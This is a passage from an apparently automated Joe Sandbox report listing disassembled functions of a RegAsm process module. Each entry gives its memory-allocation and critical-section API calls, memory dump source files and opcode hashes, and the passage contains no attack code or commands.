                                                                            • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6CC34E9C,?,?,?,?,?), ref: 6CC35167
                                                                            • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6CC35196
                                                                            • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6CC34E9C), ref: 6CC35234
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID:
                                                                            • API String ID: 3510742995-0
                                                                            • Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                            • Instruction ID: 68aaadce41f194fe15c1618fa8afda310899862de40645545528940ef4927389
                                                                            • Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                            • Instruction Fuzzy Hash: 6C919D75505626CFCB14CF08D490A56BBB1FF89318B298688DC599B715E772FC82CBE0
                                                                            Function 6CC708F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC70918
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC709A6
                                                                            • EnterCriticalSection.KERNEL32(6CCBE7DC,?,00000000), ref: 6CC709F3
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC70ACB
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave
                                                                            • String ID:
                                                                            • API String ID: 3168844106-0
                                                                            • Opcode ID: 514945f0099e71a1b6c5d2a19c7781b4b856f94f01ee2e730ddb138a9b7de064
                                                                            • Instruction ID: 78a44644e9a296e125ba38fd93488956ac760f5d61c2897166dde20c251322e3
                                                                            • Opcode Fuzzy Hash: 514945f0099e71a1b6c5d2a19c7781b4b856f94f01ee2e730ddb138a9b7de064
                                                                            • Instruction Fuzzy Hash: 44514A367016508FEF149AAAC49462673B1FBC2B34B25817ED865A7F80F732E84187E4
                                                                            Function 6CC959C0 Relevance: 5.2, APIs: 4, Instructions: 155COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6CC6E56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6CC95A47
                                                                            • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6CC6E56A,?,|UrlbarCSSSpan), ref: 6CC95A5C
                                                                            • free.MOZGLUE(?), ref: 6CC95A97
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6CC95B9D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$mallocmemset
                                                                            • String ID:
                                                                            • API String ID: 2682772760-0
                                                                            • Opcode ID: 1f0cd7bfb18409896c1bb4dacdd783245d3bac3c1d0fcd84d5427013d87bda5f
                                                                            • Instruction ID: da49d115dc4add6f80abea42ec90199b0fed30b5ddc2bee46991e0b7d608392c
                                                                            • Opcode Fuzzy Hash: 1f0cd7bfb18409896c1bb4dacdd783245d3bac3c1d0fcd84d5427013d87bda5f
                                                                            • Instruction Fuzzy Hash: 6E514F706087409FD701CF29C8C062AF7E5FF8A319F04CA6DE8899B646EB74D945CB66
                                                                            Function 6CC8B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CC8B2C9,?,?,?,6CC8B127,?,?,?,?,?,?,?,?,?,6CC8AE52), ref: 6CC8B628
                                                                              • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC890FF
                                                                              • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC89108
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CC8B2C9,?,?,?,6CC8B127,?,?,?,?,?,?,?,?,?,6CC8AE52), ref: 6CC8B67D
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CC8B2C9,?,?,?,6CC8B127,?,?,?,?,?,?,?,?,?,6CC8AE52), ref: 6CC8B708
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CC8B127,?,?,?,?,?,?,?,?), ref: 6CC8B74D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: freemalloc
                                                                            • String ID:
                                                                            • API String ID: 3061335427-0
                                                                            • Opcode ID: c66a745af5927c0317225de55ecf81d470cf91db3572232835a7805d7c461940
                                                                            • Instruction ID: bbcee1d273a83f657d9933ef574e51e4c8dfb50bcfe507a3e12f772b2dac7e34
                                                                            • Opcode Fuzzy Hash: c66a745af5927c0317225de55ecf81d470cf91db3572232835a7805d7c461940
                                                                            • Instruction Fuzzy Hash: 9251CD71A067168BDF18CF58C9A066FBBB1FF45308F55852DD85AAB710EB31E804CBA1
                                                                            Function 6CC8DF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6CC7FF2A), ref: 6CC8DFFD
                                                                              • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC890FF
                                                                              • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC89108
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC7FF2A), ref: 6CC8E04A
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC7FF2A), ref: 6CC8E0C0
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6CC7FF2A), ref: 6CC8E0FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: freemalloc
                                                                            • String ID:
                                                                            • API String ID: 3061335427-0
                                                                            • Opcode ID: 109519bfd85cd8d0a685649128bc63d06de12dfd4c816c85453c06ddbf1b9107
                                                                            • Instruction ID: 01a554ee563d53cbded722171d6f67002b4da27a42a3332fcc1752bbea3c1e37
                                                                            • Opcode Fuzzy Hash: 109519bfd85cd8d0a685649128bc63d06de12dfd4c816c85453c06ddbf1b9107
                                                                            • Instruction Fuzzy Hash: 5741AFB96062168BEB14CF68D88035B7BB6BB4630CF24493DD516DB740F732E906CB92
                                                                            Function 6CC96180 Relevance: 5.1, APIs: 4, Instructions: 107COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6CC961DD
                                                                            • memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6CC9622C
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CC96250
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC96292
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: malloc$freememcpy
                                                                            • String ID:
                                                                            • API String ID: 4259248891-0
                                                                            • Opcode ID: 9208c1cfadfc6372149069bbe754d522fc33fedafc017f82a91c00f8340f5e44
                                                                            • Instruction ID: d30eeedc67ff11d667fea68e57b8c4c92937670672f09217949a2db96eb5b86d
                                                                            • Opcode Fuzzy Hash: 9208c1cfadfc6372149069bbe754d522fc33fedafc017f82a91c00f8340f5e44
                                                                            • Instruction Fuzzy Hash: 3B310671A00E0A8FDB04CF28D880AAA73F9FB95308F11453AD55AD7691FB31E598C791
                                                                            Function 6CC86E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6CC86EAB
                                                                            • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6CC86EFA
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CC86F1E
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC86F5C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: malloc$freememcpy
                                                                            • String ID:
                                                                            • API String ID: 4259248891-0
                                                                            • Opcode ID: 8993a7da8df1a7a4f61039b7f7d584e57bb3e96bec047d6851481120ae3c607d
                                                                            • Instruction ID: f92bda0adf23ef619728820f18ed3dfedfdd264b6541c3692d680f90dc29fac6
                                                                            • Opcode Fuzzy Hash: 8993a7da8df1a7a4f61039b7f7d584e57bb3e96bec047d6851481120ae3c607d
                                                                            • Instruction Fuzzy Hash: A831F471A21A0A8FDB04CF2CD941AAB77E9BB85308F504139D41AC7651FB31E55987A0
                                                                            Function 6CC9B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CC40A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9B5EA
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6CC40A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9B623
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CC40A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9B66C
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6CC40A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9B67F
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: malloc$free
                                                                            • String ID:
                                                                            • API String ID: 1480856625-0
                                                                            • Opcode ID: 28155cc96a5ca25e9f0873547401c030d17c6c7a31407e9074f16611fd0ce82b
                                                                            • Instruction ID: 6f6460a7818f944e815297a6f9d8ae038752eea0be424160601919ecc5d8875f
                                                                            • Opcode Fuzzy Hash: 28155cc96a5ca25e9f0873547401c030d17c6c7a31407e9074f16611fd0ce82b
                                                                            • Instruction Fuzzy Hash: B2312771A002169FDB28CF59C85465ABBF5FF81304F16852AD806DB311EB31F915CBE0
                                                                            Function 6CC6F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CC6F611
                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC6F623
                                                                            • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CC6F652
                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC6F668
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID:
                                                                            • API String ID: 3510742995-0
                                                                            • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                            • Instruction ID: 9062c10da60e88d4b4e8d0efcbe617984d9e0f302326ccdef4ce1be6516e5483
                                                                            • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                            • Instruction Fuzzy Hash: C5315E71A00214AFC714CF5ACDC4A9A77B5FB84354B14853DEA4A8BF04E632ED458B90
                                                                            Function 6CC339A0 Relevance: 5.1, APIs: 4, Instructions: 86COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBE744,6CC97765,00000000,6CC97765,?,6CC56112), ref: 6CC339AF
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE744,?,6CC56112), ref: 6CC33A34
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784,6CC56112), ref: 6CC33A4B
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC33A5F
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave
                                                                            • String ID:
                                                                            • API String ID: 3168844106-0
                                                                            • Opcode ID: 39ee478e7cd308ffa62ddb97b0c77ad4dbdf837548ff45a894f413dba49c1d9f
                                                                            • Instruction ID: 0e70d531bc420b5a580e076ba3c5a5a98ab634a62042974d1965cb1e53c8b95e
                                                                            • Opcode Fuzzy Hash: 39ee478e7cd308ffa62ddb97b0c77ad4dbdf837548ff45a894f413dba49c1d9f
                                                                            • Instruction Fuzzy Hash: 262168367017118FCB149FE6D495A2673B1EF86B547280A1DD469A3F90FB31AC02C785
                                                                            Function 6CC4B940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC4B96F
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6CC4B99A
                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC4B9B0
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC4B9B9
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$freemalloc
                                                                            • String ID:
                                                                            • API String ID: 3313557100-0
                                                                            • Opcode ID: 967c321ebbbafde46be8047ff515d0d53ebfc995cd9cc7ee622f86fde4181937
                                                                            • Instruction ID: 76d5c866fef692e81fc026d244521d0da156360efe8846f830fb2aaf88c5fe92
                                                                            • Opcode Fuzzy Hash: 967c321ebbbafde46be8047ff515d0d53ebfc995cd9cc7ee622f86fde4181937
                                                                            • Instruction Fuzzy Hash: 75114FB1A002069FCB04DF69D8848AFB7F8BF98314B14853AE91AD3711E731A9158AA1
                                                                            Function 6CC826B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free
                                                                            • String ID:
                                                                            • API String ID: 1294909896-0
                                                                            • Opcode ID: 0936faf57fde408764e48ec1a9e0140e39618fff42944ceeebbc0395f2fbf2b6
                                                                            • Instruction ID: e82d43d1b88df88e19c19fe44e6bc361e2469cdf266f84fc3f60822f2c328e32
                                                                            • Opcode Fuzzy Hash: 0936faf57fde408764e48ec1a9e0140e39618fff42944ceeebbc0395f2fbf2b6
                                                                            • Instruction Fuzzy Hash: DDF0F9B27022005BEB009A58E88C947B7B9EF4121CB500035FA16C3B01F331F929C6A5